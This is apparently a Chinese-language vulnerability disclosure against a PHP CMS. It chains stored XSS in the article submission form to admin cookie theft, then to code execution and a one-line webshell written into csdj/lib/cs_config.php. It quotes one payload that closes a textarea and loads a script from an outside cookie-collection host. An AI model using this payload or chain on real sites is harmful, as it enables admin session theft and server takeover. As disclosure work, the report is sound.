### 简要描述:
好吧 亲爱的广商我又来了。。发现这个广商态度还是很不错的 ,这样才能让自己的产品更加完善。
### 详细说明:
一: xss
添加 文章处 直接提交 xss代码 会被过滤。用 火狐live http replay post提交
```
</textarea><script src=http://xss.webvul.com/5NVhnS></script>
```
[<img src="https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0319444727430208dfd6df897bc9662d6082186d.jpg)
好吧。。后台审核文章,编辑,看下源码
[<img src="https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/031946374f1b1f3797f24ef1b174a3c933323376.jpg)
插进去鸟~
[<img src="https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/03200220ab2d02458f74c17e8b1c728b47263828.jpg)
二 :getshell
收到 cookie后 修改基本信息
[<img src="https://images.seebug.org/upload/201403/0320034090dcb61fc3a924504ea93744e2d6bfe1.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/0320034090dcb61fc3a924504ea93744e2d6bfe1.jpg)
可以看到 phpinfo执行了
[<img src="https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg)
插一句话的话 连接文件为 csdj/lib/cs_config.php
第三次 提交了。。。多给点 rank瑟。。
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/032006511cd14c570f32f55700c5aea2f2cc6182.jpg)
暂无评论